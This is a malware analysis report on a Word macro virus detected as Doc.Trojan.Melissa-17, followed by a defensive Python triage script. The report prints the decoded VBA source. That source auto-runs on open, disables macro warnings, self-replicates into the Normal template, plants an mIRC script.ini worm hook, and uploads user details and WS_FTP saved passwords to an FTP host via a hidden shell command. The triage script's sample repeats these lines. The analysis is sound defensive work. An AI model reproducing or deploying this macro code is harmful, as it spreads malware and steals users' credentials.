Verdict: MALICIOUS
Risk Score: 228
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample carries VBA macros with a Document_Open auto-execute entry point. On open the macro sets On Error Resume Next, disables the cancel key and Word's macro virus warning (Options.VirusProtection = False), then checks whether the Normal template and the active document already contain its code (line 2 of the first module equal to "On Error Resume Next") and copies itself into whichever is still clean, rewriting its source with random identifier strings (the make_morph routine is cut off in the preview). Two further stages follow. Propagation: it looks for an mIRC installation or an existing script.ini (C:\MIRC, the current directory, or the parent of a folder named DOWNLOAD) and writes a script.ini whose on-JOIN event DCC-sends the infected document to every user entering a channel; this script.ini is an mIRC worm hook, not a downloader. Payload: when a task named "Sockets Window" (an active Winsock session) exists and no marker has been written yet, or on the same weekday as a previous run, it writes %WINDIR%\<UserInitials>.dat with the Word user name and address, searches C:\ for WS_FTP.ini (saved FTP site profiles and passwords), writes an FTP command script %WINDIR%\Command.$$$ that logs in to ftp.xoom.com with the user name and password hard-coded in the script and uploads the .dat file, the WS_FTP.ini if found and the document itself if it is password-protected, then runs it hidden via Shell "command.com /c FTP.exe -n -s:...". The weekday of the run is stored with System.PrivateProfileString under HKEY_CURRENT_USER\Software. The Shell() call is therefore an exfiltration step; nothing in the recovered source downloads or executes a secondary payload. The ClamAV signature Doc.Trojan.Melissa-17 corroborates the verdict.
Heuristics (6)
- ClamAV: Doc.Trojan.Melissa-17 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Melissa-17.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): in this sample the call runs command.com /c FTP.exe -n -s:%WINDIR%\Command.$$$ with vbHide, i.e. a hidden FTP upload.
- Document_Open macro (high, OLE_VBA_DOCOPEN): the auto-execute entry point; every behaviour above runs from Document_Open without user interaction beyond opening the file.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (low, OLE_VBA_ENVIRON): reads WINDIR to place the dropped .dat and Command.$$$ files.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18426 bytes | f6b0c3b018ecb03520d263d982e13ed115e874d9932be3420e45eb47104c1257 |

Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = wdDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Randomize Timer
LordArz = "Technological Illusions"
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True
If NormInstalled = False Then
Set Infection = NormCarrier
Set Carrier = ActCarrier
Else
Set Infection = ActCarrier
Set Carrier = NormCarrier
End If
DoEvents
Rem -------------------BEGIN WORM------------------------------------->
Close
Tr1 = Dir(CurDir & "\script.ini", vbNormal)
Tr2 = UCase(Right(CurDir, 8))
Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)
If Tr1 <> "" Then SDir = CurDir & "\script.ini"
If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"
If SDir <> "" Then
Open SDir For Output As #1
Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
Close #1
End If
Rem ----------------------------END WORM------------------------------>
DoEvents
Rem ----------------------------BEGIN PAYLOAD------------------------->
WinPath = Environ("WINDIR")
If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Or System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date) Then
With Application.FileSearch
.FileName = "WS_FTP.ini"
.LookIn = "C" & Chr(58) & "\"
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
WsPath = .FoundFiles(1)
End With
DoEvents
If ActiveDocument.HasPassword = True Then BCK = True
DoEvents
Open WinPath & "\" & Application.UserInitials & ".dat" For Output As #10
Print #10, Application.UserName
Print #10, Application.UserAddress
If BCK = True Then Print #10, ActiveDocument.FullName
If WsPath <> "" Then Print #10, "WS_FTP"
Close #10
Open WinPath & "\Command.$$$" For Output As #8
Print #8, "o ftp.xoom.com"
Print #8, "User SingOfScream"
Print #8, "DIG001"
Print #8, "binary"
Print #8, "put " & WinPath & "\" & Application.UserInitials & ".dat"
If WsPath <> "" Then Print #8, "put " & WsPath
If BCK = True Then Print #8, "put " & ActiveDocument.FullName
Print #8, "quit"
Close
Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date)
End If
Rem ------------------------------END OF PAYLOAD---------------------->
For x = 1 To ThisDocument.Variables.Count
ThisDocument.Variables(x).Delete
Next x
For x = 1 To Normal.ThisDocument.Variables.Count
Normal.ThisDocument.Variables(x).Delete
Next x
With Carrier
UECode = .Lines(1, 2) & Chr(13)
For x = 5 To .CountOfLines - 1
VCCode = .Lines(x, 1)
If VCCode = "End Sub" Then Exit For
For i = 1 To 20
If Mid(VCCode, i, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - i)
Next i
factor = ""
For Y = 1 To Int(Rnd * 6) + 6
factor = factor & Chr(Int(Rnd * 25) + 65)
Next Y
make_morph =
... (truncated)
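The recovered source lends itself to a small source-level triage pass. The following Python script is an added example, not code from this report, its analyzer or oletools: it applies the auto-exec-plus-execution-token rule that the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes, but at source level (the real heuristic works on the compiled p-code stream), folds the Chr()/"&" string building, and lists the dropped files, the mIRC on-JOIN hook, the FTP upload script and the Shell command line. SAMPLE_VBA is a constructed excerpt of the preview above; the function names (resolve, collect_constants, triage), the token list and the {name} / %VAR% placeholder notation are this example's own conventions.

```python
"""Source-level triage of an extracted VBA macro.  Added example, not code from
the report, the analyzer or oletools: it applies the auto-exec-plus-execution
rule the heuristics describe and folds the macro's string building so the
dropped files, the mIRC hook and the FTP upload script can be read directly."""
import re

# Constructed excerpt of the preview above (not the full 18,426-byte macro).
SAMPLE_VBA = r'''
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)
If Tr1 <> "" Then SDir = CurDir & "\script.ini"
If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"
Open SDir For Output As #1
Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
WinPath = Environ("WINDIR")
Open WinPath & "\" & Application.UserInitials & ".dat" For Output As #10
Print #10, Application.UserName
Open WinPath & "\Command.$$$" For Output As #8
Print #8, "o ftp.xoom.com"
Print #8, "User SingOfScream"
Print #8, "DIG001"
Print #8, "put " & WinPath & "\" & Application.UserInitials & ".dat"
Print #8, "quit"
Close
Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
End Sub
'''

TOKEN = re.compile(r'"([^"]*)"|Chr\((\d+)\)|Environ\("(\w+)"\)|([A-Za-z_][\w.]*)')
ASSIGN = re.compile(r'^(?:If\s+.*?\s+Then\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$')
OPEN = re.compile(r'^Open\s+(.+?)\s+For\s+(?:Output|Append|Binary)\s+As\s+#(\d+)', re.I)
PRINT = re.compile(r'^Print\s+#(\d+),\s*(.+)$')
SHELL = re.compile(r'^Shell\s+(.*?)(?:,\s*vb\w+)?\s*$')
AUTOEXEC = re.compile(r'\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoExec|AutoClose|Workbook_Open|Auto_Open)\b')
# Tokens that, next to an auto-exec entry point, make the document suspicious.
EXEC_TOKENS = ('Shell', 'Environ', 'CreateObject', 'URLDownloadToFile', 'VirusProtection')


def resolve(expr, env=None):
    """Fold a VBA '&' concatenation of literals, Chr(n), Environ("X") and names.
    Names with a known value in env are substituted; the rest stay as {name}."""
    env = env or {}
    out = []
    for lit, code, var, name in TOKEN.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif var:
            out.append('%' + var + '%')
        elif name:
            out.append(env.get(name, '{' + name + '}'))
        else:
            out.append(lit)
    return ''.join(out)


def collect_constants(src):
    """Remember variables whose value folds to a plain string (later assignments
    win); values still depending on run-time names, like CurDir, are skipped."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN.match(line.strip())
        if m:
            value = resolve(m.group(2), env)
            if '{' not in value:
                env[m.group(1)] = value
    return env


def triage(src):
    """Return the indicators a responder wants from the macro source."""
    env = collect_constants(src)
    files, shell = {}, []
    for line in src.splitlines():
        line = line.strip()
        if m := OPEN.match(line):
            files[m.group(2)] = {'path': resolve(m.group(1), env), 'lines': []}
        elif m := PRINT.match(line):
            f = files.setdefault(m.group(1), {'path': '?', 'lines': []})
            f['lines'].append(resolve(m.group(2), env))
        elif m := SHELL.match(line):
            shell.append(resolve(m.group(1), env))
    autoexec = sorted(set(AUTOEXEC.findall(src)))
    tokens = [t for t in EXEC_TOKENS if re.search(r'\b%s\b' % t, src)]
    dropped = {f['path']: f['lines'] for f in files.values()}
    ftp_hosts = [l.split()[1] for lines in dropped.values() for l in lines
                 if l.split()[:1] in (['o'], ['open'])]
    mirc = [p for p, lines in dropped.items() if p.lower().endswith('script.ini')
            and any('/dcc send' in l for l in lines)]
    return {'autoexec': autoexec, 'exec_tokens': tokens,
            'flag': bool(autoexec) and bool(tokens),  # the auto-exec + exec rule
            'dropped_files': dropped, 'shell_commands': shell,
            'ftp_hosts': ftp_hosts, 'mirc_propagation_files': mirc}


if __name__ == '__main__':
    print(triage(SAMPLE_VBA))
```

Run it as-is to dump the indicators, or point it at the decoded macros.bas that olevba produces. Values that only exist at run time (Application.UserInitials, ThisDocument.FullName) stay as placeholders; that is precisely the gap a sandbox execution fills in, while everything hard-coded (the C:\MIRC\Script.ini drop, the ftp.xoom.com target, the FTP credentials and the hidden command.com / FTP.exe invocation) is recoverable statically.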